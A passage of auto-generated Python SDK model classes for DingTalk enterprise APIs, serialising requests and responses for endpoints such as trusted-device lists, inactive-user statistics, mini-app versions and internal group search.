return _map
result = dict()
if self.doc_created_cnt is not None:
result['docCreatedCnt'] = self.doc_created_cnt
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('docCreatedCnt') is not None:
self.doc_created_cnt = m.get('docCreatedCnt')
return self
class GetDocCreatedSummaryResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetDocCreatedSummaryResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetDocCreatedSummaryResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class SendAppDingHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class SendAppDingRequest(TeaModel):
def __init__(
self,
userids: List[str] = None,
content: str = None,
):
# 接收DING消息的用户列表
self.userids = userids
# 消息内容
self.content = content
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.userids is not None:
result['userids'] = self.userids
if self.content is not None:
result['content'] = self.content
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('userids') is not None:
self.userids = m.get('userids')
if m.get('content') is not None:
self.content = m.get('content')
return self
class SendAppDingResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
):
self.headers = headers
def validate(self):
self.validate_required(self.headers, 'headers')
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
return self
class UpdatePartnerVisibilityHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class UpdatePartnerVisibilityRequest(TeaModel):
def __init__(
self,
label_id: int = None,
dept_ids: List[int] = None,
user_ids: List[str] = None,
ding_client_id: str = None,
ding_token_grant_type: int = None,
ding_org_id: int = None,
ding_isv_org_id: int = None,
ding_suite_key: str = None,
ding_corp_id: str = None,
):
# 标签id
self.label_id = label_id
# 可见的部门id
self.dept_ids = dept_ids
# 可见的员工id
self.user_ids = user_ids
self.ding_client_id = ding_client_id
self.ding_token_grant_type = ding_token_grant_type
self.ding_org_id = ding_org_id
self.ding_isv_org_id = ding_isv_org_id
self.ding_suite_key = ding_suite_key
self.ding_corp_id = ding_corp_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.label_id is not None:
result['labelId'] = self.label_id
if self.dept_ids is not None:
result['deptIds'] = self.dept_ids
if self.user_ids is not None:
result['userIds'] = self.user_ids
if self.ding_client_id is not None:
result['dingClientId'] = self.ding_client_id
if self.ding_token_grant_type is not None:
result['dingTokenGrantType'] = self.ding_token_grant_type
if self.ding_org_id is not None:
result['dingOrgId'] = self.ding_org_id
if self.ding_isv_org_id is not None:
result['dingIsvOrgId'] = self.ding_isv_org_id
if self.ding_suite_key is not None:
result['dingSuiteKey'] = self.ding_suite_key
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('labelId') is not None:
self.label_id = m.get('labelId')
if m.get('deptIds') is not None:
self.dept_ids = m.get('deptIds')
if m.get('userIds') is not None:
self.user_ids = m.get('userIds')
if m.get('dingClientId') is not None:
self.ding_client_id = m.get('dingClientId')
if m.get('dingTokenGrantType') is not None:
self.ding_token_grant_type = m.get('dingTokenGrantType')
if m.get('dingOrgId') is not None:
self.ding_org_id = m.get('dingOrgId')
if m.get('dingIsvOrgId') is not None:
self.ding_isv_org_id = m.get('dingIsvOrgId')
if m.get('dingSuiteKey') is not None:
self.ding_suite_key = m.get('dingSuiteKey')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
return self
class UpdatePartnerVisibilityResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: bool = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
self.body = m.get('body')
return self
class GetDingReportDeptSummaryHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetDingReportDeptSummaryRequest(TeaModel):
def __init__(
self,
next_token: int = None,
max_results: int = None,
):
# 启始数据游标
self.next_token = next_token
# 每页包含的数据条数
self.max_results = max_results
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.next_token is not None:
result['nextToken'] = self.next_token
if self.max_results is not None:
result['maxResults'] = self.max_results
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
if m.get('maxResults') is not None:
self.max_results = m.get('maxResults')
return self
class GetDingReportDeptSummaryResponseBodyData(TeaModel):
def __init__(
self,
dept_id: str = None,
dept_name: str = None,
ding_report_send_usr_cnt: str = None,
ding_report_send_cnt: str = None,
):
# 部门id
self.dept_id = dept_id
# 部门名称
self.dept_name = dept_name
# 最近1天累计创建日志人数
self.ding_report_send_usr_cnt = ding_report_send_usr_cnt
# 最近1天累计创建日志数
self.ding_report_send_cnt = ding_report_send_cnt
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.dept_id is not None:
result['deptId'] = self.dept_id
if self.dept_name is not None:
result['deptName'] = self.dept_name
if self.ding_report_send_usr_cnt is not None:
result['dingReportSendUsrCnt'] = self.ding_report_send_usr_cnt
if self.ding_report_send_cnt is not None:
result['dingReportSendCnt'] = self.ding_report_send_cnt
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('deptId') is not None:
self.dept_id = m.get('deptId')
if m.get('deptName') is not None:
self.dept_name = m.get('deptName')
if m.get('dingReportSendUsrCnt') is not None:
self.ding_report_send_usr_cnt = m.get('dingReportSendUsrCnt')
if m.get('dingReportSendCnt') is not None:
self.ding_report_send_cnt = m.get('dingReportSendCnt')
return self
class GetDingReportDeptSummaryResponseBody(TeaModel):
def __init__(
self,
data: List[GetDingReportDeptSummaryResponseBodyData] = None,
next_token: int = None,
has_more: bool = None,
):
# 部门维度发布日志信息
self.data = data
# 下一次请求的分页游标
self.next_token = next_token
# 是否有更多数据
self.has_more = has_more
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
if self.next_token is not None:
result['nextToken'] = self.next_token
if self.has_more is not None:
result['hasMore'] = self.has_more
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetDingReportDeptSummaryResponseBodyData()
self.data.append(temp_model.from_map(k))
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
if m.get('hasMore') is not None:
self.has_more = m.get('hasMore')
return self
class GetDingReportDeptSummaryResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetDingReportDeptSummaryResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetDingReportDeptSummaryResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetInActiveUserListHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetInActiveUserListRequest(TeaModel):
def __init__(
self,
stat_date: str = None,
service_id: int = None,
ding_oauth_app_id: int = None,
ding_org_id: int = None,
page_number: int = None,
page_size: int = None,
dept_ids: List[str] = None,
):
self.stat_date = stat_date
self.service_id = service_id
self.ding_oauth_app_id = ding_oauth_app_id
self.ding_org_id = ding_org_id
self.page_number = page_number
self.page_size = page_size
self.dept_ids = dept_ids
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.stat_date is not None:
result['statDate'] = self.stat_date
if self.service_id is not None:
result['serviceId'] = self.service_id
if self.ding_oauth_app_id is not None:
result['dingOauthAppId'] = self.ding_oauth_app_id
if self.ding_org_id is not None:
result['dingOrgId'] = self.ding_org_id
if self.page_number is not None:
result['pageNumber'] = self.page_number
if self.page_size is not None:
result['pageSize'] = self.page_size
if self.dept_ids is not None:
result['deptIds'] = self.dept_ids
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('statDate') is not None:
self.stat_date = m.get('statDate')
if m.get('serviceId') is not None:
self.service_id = m.get('serviceId')
if m.get('dingOauthAppId') is not None:
self.ding_oauth_app_id = m.get('dingOauthAppId')
if m.get('dingOrgId') is not None:
self.ding_org_id = m.get('dingOrgId')
if m.get('pageNumber') is not None:
self.page_number = m.get('pageNumber')
if m.get('pageSize') is not None:
self.page_size = m.get('pageSize')
if m.get('deptIds') is not None:
self.dept_ids = m.get('deptIds')
return self
class GetInActiveUserListResponseBodyMetaList(TeaModel):
def __init__(
self,
kpi_id: str = None,
kpi_name: str = None,
unit: str = None,
kpi_caliber: str = None,
period: str = None,
):
# 指标ID
self.kpi_id = kpi_id
# 指标名称
self.kpi_name = kpi_name
# 指标单位
self.unit = unit
# 指标口径
self.kpi_caliber = kpi_caliber
# 指标周期
self.period = period
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.kpi_id is not None:
result['kpiId'] = self.kpi_id
if self.kpi_name is not None:
result['kpiName'] = self.kpi_name
if self.unit is not None:
result['unit'] = self.unit
if self.kpi_caliber is not None:
result['kpiCaliber'] = self.kpi_caliber
if self.period is not None:
result['period'] = self.period
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('kpiId') is not None:
self.kpi_id = m.get('kpiId')
if m.get('kpiName') is not None:
self.kpi_name = m.get('kpiName')
if m.get('unit') is not None:
self.unit = m.get('unit')
if m.get('kpiCaliber') is not None:
self.kpi_caliber = m.get('kpiCaliber')
if m.get('period') is not None:
self.period = m.get('period')
return self
class GetInActiveUserListResponseBody(TeaModel):
def __init__(
self,
data_list: List[Dict[str, Any]] = None,
meta_list: List[GetInActiveUserListResponseBodyMetaList] = None,
):
# 指标数据
self.data_list = data_list
# 指标元数据
self.meta_list = meta_list
def validate(self):
if self.meta_list:
for k in self.meta_list:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.data_list is not None:
result['dataList'] = self.data_list
result['metaList'] = []
if self.meta_list is not None:
for k in self.meta_list:
result['metaList'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('dataList') is not None:
self.data_list = m.get('dataList')
self.meta_list = []
if m.get('metaList') is not None:
for k in m.get('metaList'):
temp_model = GetInActiveUserListResponseBodyMetaList()
self.meta_list.append(temp_model.from_map(k))
return self
class GetInActiveUserListResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetInActiveUserListResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetInActiveUserListResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetTrustDeviceListHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetTrustDeviceListRequest(TeaModel):
def __init__(
self,
user_ids: List[str] = None,
):
self.user_ids = user_ids
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.user_ids is not None:
result['userIds'] = self.user_ids
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('userIds') is not None:
self.user_ids = m.get('userIds')
return self
class GetTrustDeviceListResponseBodyData(TeaModel):
def __init__(
self,
user_id: str = None,
platform: str = None,
mac_address: str = None,
status: int = None,
create_time: int = None,
):
# 员工Id
self.user_id = user_id
# 平台类型
self.platform = platform
# mac地址
self.mac_address = mac_address
# 设备状态
self.status = status
# 创建时间
self.create_time = create_time
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.user_id is not None:
result['userId'] = self.user_id
if self.platform is not None:
result['platform'] = self.platform
if self.mac_address is not None:
result['macAddress'] = self.mac_address
if self.status is not None:
result['status'] = self.status
if self.create_time is not None:
result['createTime'] = self.create_time
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('userId') is not None:
self.user_id = m.get('userId')
if m.get('platform') is not None:
self.platform = m.get('platform')
if m.get('macAddress') is not None:
self.mac_address = m.get('macAddress')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('createTime') is not None:
self.create_time = m.get('createTime')
return self
class GetTrustDeviceListResponseBody(TeaModel):
def __init__(
self,
data: List[GetTrustDeviceListResponseBodyData] = None,
):
self.data = data
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetTrustDeviceListResponseBodyData()
self.data.append(temp_model.from_map(k))
return self
class GetTrustDeviceListResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetTrustDeviceListResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetTrustDeviceListResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class ListMiniAppAvailableVersionHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class ListMiniAppAvailableVersionRequest(TeaModel):
def __init__(
self,
version_type_set: List[int] = None,
page_size: int = None,
page_number: int = None,
ding_isv_org_id: int = None,
ding_org_id: int = None,
ding_suite_key: str = None,
ding_corp_id: str = None,
ding_client_id: str = None,
ding_token_grant_type: int = None,
mini_app_id: str = None,
):
# 版本类型列表,0-开发版,1-灰度版,2-发布版,3-体验版
self.version_type_set = version_type_set
# 分页大小
self.page_size = page_size
# 分页数1
self.page_number = page_number
self.ding_isv_org_id = ding_isv_org_id
self.ding_org_id = ding_org_id
self.ding_suite_key = ding_suite_key
self.ding_corp_id = ding_corp_id
self.ding_client_id = ding_client_id
self.ding_token_grant_type = ding_token_grant_type
# 小程序id
self.mini_app_id = mini_app_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.version_type_set is not None:
result['versionTypeSet'] = self.version_type_set
if self.page_size is not None:
result['pageSize'] = self.page_size
if self.page_number is not None:
result['pageNumber'] = self.page_number
if self.ding_isv_org_id is not None:
result['dingIsvOrgId'] = self.ding_isv_org_id
if self.ding_org_id is not None:
result['dingOrgId'] = self.ding_org_id
if self.ding_suite_key is not None:
result['dingSuiteKey'] = self.ding_suite_key
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.ding_client_id is not None:
result['dingClientId'] = self.ding_client_id
if self.ding_token_grant_type is not None:
result['dingTokenGrantType'] = self.ding_token_grant_type
if self.mini_app_id is not None:
result['miniAppId'] = self.mini_app_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('versionTypeSet') is not None:
self.version_type_set = m.get('versionTypeSet')
if m.get('pageSize') is not None:
self.page_size = m.get('pageSize')
if m.get('pageNumber') is not None:
self.page_number = m.get('pageNumber')
if m.get('dingIsvOrgId') is not None:
self.ding_isv_org_id = m.get('dingIsvOrgId')
if m.get('dingOrgId') is not None:
self.ding_org_id = m.get('dingOrgId')
if m.get('dingSuiteKey') is not None:
self.ding_suite_key = m.get('dingSuiteKey')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('dingClientId') is not None:
self.ding_client_id = m.get('dingClientId')
if m.get('dingTokenGrantType') is not None:
self.ding_token_grant_type = m.get('dingTokenGrantType')
if m.get('miniAppId') is not None:
self.mini_app_id = m.get('miniAppId')
return self
class ListMiniAppAvailableVersionResponseBodyList(TeaModel):
def __init__(
self,
build_status: int = None,
version: str = None,
):
# 打包状态,0-打包中,1-成功,2-失败
self.build_status = build_status
# 版本
self.version = version
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.build_status is not None:
result['buildStatus'] = self.build_status
if self.version is not None:
result['version'] = self.version
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('buildStatus') is not None:
self.build_status = m.get('buildStatus')
if m.get('version') is not None:
self.version = m.get('version')
return self
class ListMiniAppAvailableVersionResponseBody(TeaModel):
def __init__(
self,
list: List[ListMiniAppAvailableVersionResponseBodyList] = None,
):
# result
self.list = list
def validate(self):
if self.list:
for k in self.list:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['list'] = []
if self.list is not None:
for k in self.list:
result['list'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
self.list = []
if m.get('list') is not None:
for k in m.get('list'):
temp_model = ListMiniAppAvailableVersionResponseBodyList()
self.list.append(temp_model.from_map(k))
return self
class ListMiniAppAvailableVersionResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: ListMiniAppAvailableVersionResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = ListMiniAppAvailableVersionResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class SearchOrgInnerGroupInfoHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class SearchOrgInnerGroupInfoRequest(TeaModel):
def __init__(
self,
group_members_count_end: int = None,
sync_to_dingpan: int = None,
group_owner: str = None,
create_time_end: int = None,
page_size: int = None,
create_time_start: int = None,
uuid: str = None,
group_members_count_start: int = None,
last_active_time_end: int = None,
operator_user_id: str = None,
group_name: str = None,
page_start: int = None,
last_active_time_start: int = None,
):
# groupMembersCntEnd
self.group_members_count_end = group_members_count_end
# syncToDingpan
self.sync_to_dingpan = sync_to_dingpan
# groupOwner
self.group_owner = group_owner
# createTimeEnd
self.create_time_end = create_time_end
# pageSize
self.page_size = page_size
# createTimeStart
self.create_time_start = create_time_start
# uuid
self.uuid = uuid
# groupMembersCntStart
self.group_members_count_start = group_members_count_start
# lastActiveTimeEnd
self.last_active_time_end = last_active_time_end
# operatorUserId
self.operator_user_id = operator_user_id
# groupName
self.group_name = group_name
# pageStart
self.page_start = page_start
# lastActiveTimeStart
self.last_active_time_start = last_active_time_start
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.group_members_count_end is not None:
result['groupMembersCountEnd'] = self.group_members_count_end
if self.sync_to_dingpan is not None:
result['syncToDingpan'] = self.sync_to_dingpan
if self.group_owner is not None:
result['groupOwner'] = self.group_owner
if self.create_time_end is not None:
result['createTimeEnd'] = self.create_time_end
if self.page_size is not None:
result['pageSize'] = self.page_size
if self.create_time_start is not None:
result['createTimeStart'] = self.create_time_start
if self.uuid is not None:
result['uuid'] = self.uuid
if self.group_members_count_start is not None:
result['groupMembersCountStart'] = self.group_members_count_start
if self.last_active_time_end is not None:
result['lastActiveTimeEnd'] = self.last_active_time_end
if self.operator_user_id is not None:
result['operatorUserId'] = self.operator_user_id
if self.group_name is not None:
result['groupName'] = self.group_name
if self.page_start is not None:
result['pageStart'] = self.page_start
if self.last_active_time_start is not None:
result['lastActiveTimeStart'] = self.last_active_time_start
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('groupMembersCountEnd') is not None:
self.group_members_count_end = m.get('groupMembersCountEnd')
if m.get('syncToDingpan') is not None:
self.sync_to_dingpan = m.get('syncToDingpan')
if m.get('groupOwner') is not None:
self.group_owner = m.get('groupOwner')
if m.get('createTimeEnd') is not None:
self.create_time_end = m.get('createTimeEnd')
if m.get('pageSize') is not None:
self.page_size = m.get('pageSize')
if m.get('createTimeStart') is not None:
self.create_time_start = m.get('createTimeStart')
if m.get('uuid') is not None:
self.uuid = m.get('uuid')
if m.get('groupMembersCountStart') is not None:
self.group_members_count_start = m.get('groupMembersCountStart')
if m.get('lastActiveTimeEnd') is not None:
self.last_active_time_end = m.get('lastActiveTimeEnd')
if m.get('operatorUserId') is not None:
self.operator_user_id = m.get('operatorUserId')
if m.get('groupName') is not None:
self.group_name = m.get('groupName')
if m.get('pageStart') is not None:
self.page_start = m.get('pageStart')
if m.get('lastActiveTimeStart') is not None:
self.last_active_time_start = m.get('lastActiveTimeStart')
return self
class SearchOrgInnerGroupInfoResponseBodyItems(TeaModel):
def __init__(
self,
open_conversation_id: str = None,
group_owner: str = None,
group_name: str = None,
group_admins_count: int = None,
group_members_count: int = None,
group_create_time: int = None,
group_last_active_time: int = None,
group_last_active_time_show: str = None,
sync_to_dingpan: int = None,
used_quota: int = None,
group_owner_user_id: str = None,
status: int = None,
template_id: str = None,
template_name: str = None,
):
self.open_conversation_id = open_conversation_id
self.group_owner = group_owner
self.group_name = group_name
self.group_admins_count = group_admins_count
self.group_members_count = group_members_count
self.group_create_time = group_create_time
self.group_last_active_time = group_last_active_time
self.group_last_active_time_show = group_last_active_time_show
self.sync_to_dingpan = sync_to_dingpan
self.used_quota = used_quota
self.group_owner_user_id = group_owner_user_id
self.status = status
self.template_id = template_id
self.template_name = template_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.open_conversation_id is not None:
result['openConversationId'] = self.open_conversation_id
if self.group_owner is not None:
result['groupOwner'] = self.group_owner
if self.group_name is not None:
result['groupName'] = self.group_name
if self.group_admins_count is not None:
result['groupAdminsCount'] = self.group_admins_count
if self.group_members_count is not None:
result['groupMembersCount'] = self.group_members_count
if self.group_create_time is not None:
result['groupCreateTime'] = self.group_create_time
if self.group_last_active_time is not None:
result['groupLastActiveTime'] = self.group_last_active_time
if self.group_last_active_time_show is not None:
result['groupLastActiveTimeShow'] = self.group_last_active_time_show
if self.sync_to_dingpan is not None:
result['syncToDingpan'] = self.sync_to_dingpan
if self.used_quota is not None:
result['usedQuota'] = self.used_quota
if self.group_owner_user_id is not None:
result['groupOwnerUserId'] = self.group_owner_user_id
if self.status is not None:
result['status'] = self.status
if self.template_id is not None:
result['templateId'] = self.template_id
if self.template_name is not None:
result['templateName'] = self.template_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('openConversationId') is not None:
self.open_conversation_id = m.get('openConversationId')
if m.get('groupOwner') is not None:
self.group_owner = m.get('groupOwner')
if m.get('groupName') is not None:
self.group_name = m.get('groupName')
if m.get('groupAdminsCount') is not None:
self.group_admins_count = m.get('groupAdminsCount')
if m.get('groupMembersCount') is not None:
self.group_members_count = m.get('groupMembersCount')
if m.get('groupCreateTime') is not None:
self.group_create_time = m.get('groupCreateTime')
if m.get('groupLastActiveTime') is not None:
self.group_last_active_time = m.get('groupLastActiveTime')
if m.get('groupLastActiveTimeShow') is not None:
self.group_last_active_time_show = m.get('groupLastActiveTimeShow')
if m.get('syncToDingpan') is not None:
self.sync_to_dingpan = m.get('syncToDingpan')
if m.get('usedQuota') is not None:
self.used_quota = m.get('usedQuota')
if m.get('groupOwnerUserId') is not None:
self.group_owner_user_id = m.get('groupOwnerUserId')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('templateId') is not None:
self.template_id = m.get('templateId')
if m.get('templateName') is not None:
self.template_name = m.get('templateName')
return self
class SearchOrgInnerGroupInfoResponseBody(TeaModel):
def __init__(
self,
total_count: int = None,
item_count: int = None,
